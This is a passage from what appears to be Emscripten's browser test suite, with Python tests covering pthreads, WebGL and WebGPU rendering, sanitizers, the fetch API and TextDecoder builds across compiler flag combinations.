self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX) functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func)
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js') # TextDecoder disabled, JS fallback only
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js') # default: TextDecoder with JS fallback
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js') # TextDecoder only, no JS fallback
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, when using Chrome as the browser,
# you may want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, when using Chrome as the browser,
# you may want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES2'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that the shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
